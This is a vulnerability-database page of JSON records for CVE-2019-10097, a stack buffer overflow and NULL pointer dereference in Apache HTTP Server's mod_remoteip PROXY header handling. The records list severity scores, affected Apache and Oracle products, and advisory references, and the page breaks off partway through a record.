DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2019-10097", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2019-10097", "description": "In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.", "published": "2019-09-26T16:15:00", "modified": "2021-07-07T19:01:00", "epss": [{"cve": "CVE-2019-10097", "epss": 0.94943, "percentile": 0.98917, "modified": "2023-06-13"}], "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.0}, "severity": "MEDIUM", "exploitabilityScore": 6.8, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10097", "reporter": "security@apache.org", "references": ["https://httpd.apache.org/security/vulnerabilities_24.html", "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "https://access.redhat.com/errata/RHSA-2019:4126", "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3Ccvs.httpd.apache.org%3E", "https://www.oracle.com/security-alerts/cpuapr2020.html", "https://www.oracle.com/security-alerts/cpujul2020.html", "https://www.oracle.com/security-alerts/cpuoct2020.html", "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/rd2fb621142e7fa187cfe12d7137bf66e7234abcbbcd800074c84a538@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/r06f0d87ebb6d59ed8379633f36f72f5b1f79cadfda72ede0830b42cf@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/r03ee478b3dda3e381fd6189366fa7af97c980d2f602846eef935277d@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/r3c5c3104813c1c5508b55564b66546933079250a46ce50eee90b2e36@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/rd336919f655b7ff309385e34a143e41c503e133da80414485b3abcc9@%3Ccvs.httpd.apache.org%3E", "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3Ccvs.httpd.apache.org%3E"], "cvelist": ["CVE-2019-10097"], "immutableFields": [], "lastseen": "2023-06-13T14:23:33", "viewCount": 1235, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4751"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2019-10097"]}, {"type": "amazon", "idList": ["ALAS-2019-1311", "ALAS2-2019-1341"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1915"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:7B58D", "DEBIAN:DSA-4509-1:D6C70"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-10097"]}, {"type": "f5", "idList": ["F5:K54207009"]}, {"type": "fedora", "idList": ["FEDORA:11D1460CADC2", "FEDORA:2F93B6076D15", "FEDORA:973BC60CDD88", "FEDORA:CF92F602C6D5"]}, {"type": "freebsd", "idList": ["CAF545F2-C0D9-11E9-9051-4C72B94353B5"]}, {"type": "gentoo", "idList": ["GLSA-201909-04"]}, {"type": "hackerone", "idList": ["H1:674540"]}, {"type": "httpd", "idList": ["HTTPD:1476868F8E61526B31CAA5707DE2E715"]}, {"type": "ibm", "idList": ["96EA3FAB46A9992B85A37D32FF04225F7EBAA1E4A838AFAAC04B90A060C0948A", "BFF89C15B535EBBB3357938F3490EF4BD8E51EFAAA3AD2539FF46CE98385B88B", "F36AA4B00757395D62B409E84AA540BE8053C4FB4D95307651543223FA3A1743"]}, {"type": "kaspersky", "idList": ["KLA12366"]}, {"type": "mageia", "idList": ["MGASA-2019-0407"]}, {"type": "nessus", "idList": ["AL2_ALAS-2019-1341.NASL", "ALA_ALAS-2019-1311.NASL", "APACHE_2_4_41.NASL", "CENTOS8_RHSA-2020-4751.NASL", "DEBIAN_DSA-4509.NASL", "EULEROS_SA-2020-1155.NASL", "EULEROS_SA-2020-1359.NASL", "FEDORA_2019-099575A123.NASL", "FREEBSD_PKG_CAF545F2C0D911E990514C72B94353B5.NASL", "GENTOO_GLSA-201909-04.NASL", "OPENSUSE-2019-2051.NASL", "ORACLELINUX_ELSA-2020-4751.NASL", "ORACLE_HTTP_SERVER_CPU_OCT_2020.NASL", "REDHAT-RHSA-2020-1337.NASL", "REDHAT-RHSA-2020-4751.NASL", "SLACKWARE_SSA_2020-091-02.NASL", "SUSE_SU-2019-2237-1.NASL", "UBUNTU_USN-4113-1.NASL", "UBUNTU_USN-4113-2.NASL", "WEB_APPLICATION_SCANNING_98669"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310114145", "OPENVAS:1361412562310114146", "OPENVAS:1361412562310704509", "OPENVAS:1361412562310844154", "OPENVAS:1361412562310844179", "OPENVAS:1361412562310852684", "OPENVAS:1361412562310876707", "OPENVAS:1361412562310876711", "OPENVAS:1361412562310876859", "OPENVAS:1361412562310876862", "OPENVAS:1361412562311220201155", "OPENVAS:1361412562311220201359"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2020", "ORACLE:CPUJUL2020", "ORACLE:CPUOCT2019", "ORACLE:CPUOCT2020"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4751"]}, {"type": "osv", "idList": ["OSV:DSA-4509-1", "OSV:DSA-4509-2", "OSV:DSA-4509-3"]}, {"type": "redhat", "idList": ["RHSA-2019:4126", "RHSA-2020:1336", "RHSA-2020:1337", "RHSA-2020:4751"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-10097"]}, {"type": "rocky", "idList": ["RLSA-2020:4751"]}, {"type": "slackware", "idList": ["SSA-2020-091-02"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2051-1"]}, {"type": "symantec", "idList": ["SMNTC-16056"]}, {"type": "ubuntu", "idList": ["USN-4113-1", "USN-4113-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-10097"]}]}, "score": {"value": 1.6, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-23T00:45:09", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1400369263022575619", "text": " NEW: CVE-2019-10097 In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a ... (click for more) Severity: HIGH https://t.co/iXxBV9tdpt?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1400369263022575619", "text": " NEW: CVE-2019-10097 In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a ... (click for more) Severity: HIGH https://t.co/iXxBV9tdpt?amp=1"}]}, "backreferences": {"references": [{"type": "almalinux", "idList": ["ALSA-2020:4751"]}, {"type": "amazon", "idList": ["ALAS-2019-1311", "ALAS2-2019-1341"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1915"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4509-1:D6C70"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-10097"]}, {"type": "f5", "idList": ["F5:K54207009"]}, {"type": "fedora", "idList": ["FEDORA:11D1460CADC2", "FEDORA:2F93B6076D15", "FEDORA:973BC60CDD88", "FEDORA:CF92F602C6D5"]}, {"type": "freebsd", "idList": ["CAF545F2-C0D9-11E9-9051-4C72B94353B5"]}, {"type": "gentoo", "idList": ["GLSA-201909-04"]}, {"type": "hackerone", "idList": ["H1:674540"]}, {"type": "httpd", "idList": ["HTTPD:1476868F8E61526B31CAA5707DE2E715"]}, {"type": "ibm", "idList": ["96EA3FAB46A9992B85A37D32FF04225F7EBAA1E4A838AFAAC04B90A060C0948A"]}, {"type": "kaspersky", "idList": ["KLA12366"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4509.NASL", "FEDORA_2019-099575A123.NASL", "GENTOO_GLSA-201909-04.NASL", "ORACLELINUX_ELSA-2020-4751.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310114145", "OPENVAS:1361412562310114146", "OPENVAS:1361412562310704509", "OPENVAS:1361412562310844154", "OPENVAS:1361412562310852684", "OPENVAS:1361412562310876707", "OPENVAS:1361412562310876711"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2019-5072832"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-4751"]}, {"type": "redhat", "idList": ["RHSA-2020:4751"]}, {"type": "slackware", "idList": ["SSA-2020-091-02"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2051-1"]}, {"type": "symantec", "idList": ["SMNTC-16056"]}, {"type": "ubuntu", "idList": ["USN-4113-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-10097"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "apache http server", "version": 2}, {"name": "apache http server", "version": 2}, {"name": "apache http server", "version": 2}, {"name": "apache http server", "version": 2}, {"name": "apache http server", "version": 2}, {"name": "oracle communications element manager", "version": 8}, {"name": "oracle communications element manager", "version": 8}, {"name": "oracle communications element manager", "version": 8}, {"name": "oracle communications element manager", "version": 8}, {"name": "oracle communications session report manager", "version": 8}, {"name": "oracle communications session report manager", "version": 8}, {"name": "oracle communications session report manager", "version": 8}, {"name": "oracle communications session route manager", "version": 8}, {"name": "oracle communications session route manager", "version": 8}, {"name": "oracle communications session route manager", "version": 8}, {"name": "oracle enterprise manager ops center", "version": 12}, {"name": "oracle enterprise manager ops center", "version": 12}, {"name": "oracle http server", "version": 12}, {"name": "oracle instantis enterprisetrack", "version": 17}, {"name": "oracle retail xstore point of service", "version": 7}]}, "epss": [{"cve": "CVE-2019-10097", "epss": 0.93991, "percentile": 0.9868, "modified": "2023-05-06"}], "vulnersScore": 1.6}, "_state": {"dependencies": 1686666782, "score": 1686666845, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "bd5b2a9f1e00e59c99f57edb90fb4271"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:apache:http_server:2.4.34", "cpe:/a:oracle:communications_session_report_manager:8.2.0", "cpe:/a:oracle:communications_element_manager:8.1.1", "cpe:/a:apache:http_server:2.4.37", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:apache:http_server:2.4.35", "cpe:/a:oracle:communications_session_route_manager:8.2.1", "cpe:/a:oracle:communications_session_report_manager:8.2.1", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:communications_element_manager:8.1.0", "cpe:/a:oracle:communications_session_route_manager:8.1.1", "cpe:/a:oracle:communications_element_manager:8.0.0", "cpe:/a:oracle:communications_element_manager:8.2.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.4.0", "cpe:/a:oracle:http_server:12.2.1.4.0", "cpe:/a:oracle:communications_session_report_manager:8.1.1", "cpe:/a:oracle:communications_session_route_manager:8.2.0", "cpe:/a:apache:http_server:2.4.38", "cpe:/a:apache:http_server:2.4.33"], "cpe23": ["cpe:2.3:a:apache:http_server:2.4.38:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.33:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*"], "cwe": ["CWE-787", "CWE-476"], "affectedSoftware": [{"cpeName": "apache:http_server", "version": "2.4.33", "operator": "eq", "name": "apache http server"}, {"cpeName": "apache:http_server", "version": "2.4.37", "operator": "eq", "name": "apache http server"}, {"cpeName": "apache:http_server", "version": "2.4.38", "operator": "eq", "name": "apache http server"}, {"cpeName": "apache:http_server", "version": "2.4.34", "operator": "eq", "name": "apache http server"}, {"cpeName": "apache:http_server", "version": "2.4.35", "operator": "eq", "name": "apache http server"}, {"cpeName": "oracle:retail_xstore_point_of_service", "version": "7.1", "operator": "eq", "name": "oracle retail xstore point of service"}, {"cpeName": "oracle:enterprise_manager_ops_center", "version": "12.3.3", "operator": "eq", "name": "oracle enterprise manager ops center"}, {"cpeName": "oracle:enterprise_manager_ops_center", "version": "12.4.0", "operator": "eq", "name": "oracle enterprise manager ops center"}, {"cpeName": "oracle:instantis_enterprisetrack", "version": "17.3", "operator": "le", "name": "oracle instantis enterprisetrack"}, {"cpeName": "oracle:communications_element_manager", "version": "8.2.0", "operator": "eq", "name": "oracle communications element manager"}, {"cpeName": "oracle:communications_element_manager", "version": "8.1.1", "operator": "eq", "name": "oracle communications element manager"}, {"cpeName": "oracle:communications_element_manager", "version": "8.1.0", "operator": "eq", "name": "oracle communications element manager"}, {"cpeName": "oracle:communications_element_manager", "version": "8.0.0", "operator": "eq", "name": "oracle communications element manager"}, {"cpeName": "oracle:http_server", "version": "12.2.1.4.0", "operator": "eq", "name": "oracle http server"}, {"cpeName": "oracle:communications_session_report_manager", "version": "8.1.1", "operator": "eq", "name": "oracle communications session report manager"}, {"cpeName": "oracle:communications_session_report_manager", "version": "8.2.0", "operator": "eq", "name": "oracle communications session report manager"}, {"cpeName": "oracle:communications_session_report_manager", "version": "8.2.1", "operator": "eq", "name": "oracle communications session report manager"}, {"cpeName": "oracle:communications_session_route_manager", "version": "8.1.1", "operator": "eq", "name": "oracle communications session route manager"}, {"cpeName": "oracle:communications_session_route_manager", "version": "8.2.0", "operator": "eq", "name": "oracle communications session route manager"}, {"cpeName": "oracle:communications_session_route_manager", "version": "8.2.1", "operator": "eq", "name": "oracle communications session route manager"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.33:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.37:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.38:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.34:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:apache:http_server:2.4.35:*:*:*:*:*:*:*", "cpe_name": []}]}, {"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "versionStartIncluding": "17.1", "versionEndIncluding": "17.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_element_manager:8.1.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_element_manager:8.0.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "name": "https://httpd.apache.org/security/vulnerabilities_24.html", "refsource": "MISC", "tags": ["Vendor Advisory"]}, {"url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "name": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2019:4126", "name": "RHSA-2019:4126", "refsource": "REDHAT", "tags": ["Third Party Advisory"]}, {"url": "https://lists.apache.org/thread.html/rd18c3c43602e66f9cdcf09f1de233804975b9572b0456cc582390b6f@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20200401 svn commit: r1058586 [4/4] - in /websites/staging/httpd/trunk/content: ./ security/vulnerabilities-httpd.xml security/vulnerabilities_13.html security/vulnerabilities_20.html security/vulnerabilities_22.html security/vulnerabilities_24.html", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/re3d27b6250aa8548b8845d314bb8a350b3df326cacbbfdfe4d455234@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20200401 svn commit: r1058587 [4/4] - in /websites/staging/httpd/trunk/content: ./ security/vulnerabilities-httpd.xml security/vulnerabilities_13.html security/vulnerabilities_20.html security/vulnerabilities_22.html security/vulnerabilities_24.html", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://www.oracle.com/security-alerts/cpuapr2020.html", "name": "N/A", "refsource": "N/A", "tags": ["Third Party Advisory"]}, {"url": "https://www.oracle.com/security-alerts/cpujul2020.html", "name": "https://www.oracle.com/security-alerts/cpujul2020.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://www.oracle.com/security-alerts/cpuoct2020.html", "name": "https://www.oracle.com/security-alerts/cpuoct2020.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073139 [1/13] - in /websites/staging/httpd/trunk/content: ./ security/json/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/rc998b18880df98bafaade071346690c2bc1444adaa1a1ea464b93f0a@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073140 [4/4] - in /websites/staging/httpd/trunk/content: ./ security/cvejsontohtml.py security/vulnerabilities_13.html security/vulnerabilities_20.html security/vulnerabilities_22.html security/vulnerabilities_24.html", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073149 [1/13] - in /websites/staging/httpd/trunk/content: ./ security/ security/json/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/rd2fb621142e7fa187cfe12d7137bf66e7234abcbbcd800074c84a538@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1888194 [12/13] - /httpd/site/trunk/content/security/json/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/r06f0d87ebb6d59ed8379633f36f72f5b1f79cadfda72ede0830b42cf@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073143 [3/3] - in /websites/staging/httpd/trunk/content: ./ security/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/r03ee478b3dda3e381fd6189366fa7af97c980d2f602846eef935277d@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073139 [12/13] - in /websites/staging/httpd/trunk/content: ./ security/json/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/r3c5c3104813c1c5508b55564b66546933079250a46ce50eee90b2e36@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210330 svn commit: r1073149 [13/13] - in /websites/staging/httpd/trunk/content: ./ security/ security/json/", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/rd336919f655b7ff309385e34a143e41c503e133da80414485b3abcc9@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210603 svn commit: r1075360 [3/3] - in /websites/staging/httpd/trunk/content: ./ security/json/CVE-2021-31618.json security/vulnerabilities_13.html security/vulnerabilities_20.html security/vulnerabilities_22.html security/vulnerabilities_24.html", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "https://lists.apache.org/thread.html/r76142b8c5119df2178be7c2dba88fde552eedeec37ea993dfce68d1d@%3Ccvs.httpd.apache.org%3E", "name": "[httpd-cvs] 20210606 svn commit: r1075470 [4/4] - in /websites/staging/httpd/trunk/content: ./ security/json/CVE-2020-13938.json security/vulnerabilities_13.html security/vulnerabilities_20.html security/vulnerabilities_22.html security/vulnerabilities_24.html", "refsource": "MLIST", "tags": ["Mailing List", "Vendor Advisory"]}], "product_info": [{"vendor": "Oracle", "product": "Communications_session_route_manager"}, {"vendor": "Oracle", "product": "Instantis_enterprisetrack"}, {"vendor": "Oracle", "product": "Enterprise_manager_ops_center"}, {"vendor": "Apache", "product": "Http_server"}, {"vendor": "Oracle", "product": "Retail_xstore_point_of_service"}, {"vendor": "Oracle", "product": "Http_server"}, {"vendor": "Oracle", "product": "Communications_element_manager"}, {"vendor": "Oracle", "product": "Communications_session_report_manager"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"description": "Stack buffer overflow and NULL pointer dereference", "lang": "en", "type": "text"}]}], "exploits": [], "assigned": "1976-01-01T00:00:00"}

{"ubuntucve": [{"lastseen": "2023-06-29T14:27:29", "description": "In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to\nuse a trusted intermediary proxy server using the \"PROXY\" protocol, a\nspecially crafted PROXY header could trigger a stack buffer overflow or\nNULL pointer deference. This vulnerability could only be triggered by a\ntrusted proxy and not by untrusted HTTP clients.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | apache 2.4.33 through 2.4.42 (pending)\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-14T00:00:00", "type": "ubuntucve", "title": "CVE-2019-10097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2019-08-14T00:00:00", "id": "UB:CVE-2019-10097", "href": "https://ubuntu.com/security/CVE-2019-10097", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "alpinelinux": [{"lastseen": "2023-06-23T11:06:19", "description": "In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-26T16:15:00", "type": "alpinelinux", "title": "CVE-2019-10097", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2021-07-07T19:01:00", "id": "ALPINE:CVE-2019-10097", "href": "https://security.alpinelinux.org/vuln/CVE-2019-10097", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "httpd": [{"lastseen": "2023-09-09T11:24:30", "description": "When mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.", "cvss3": {}, "published": "2019-07-23T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.41 : CVE-2019-10097 mod_remoteip: Stack buffer overflow and NULL pointer dereference", 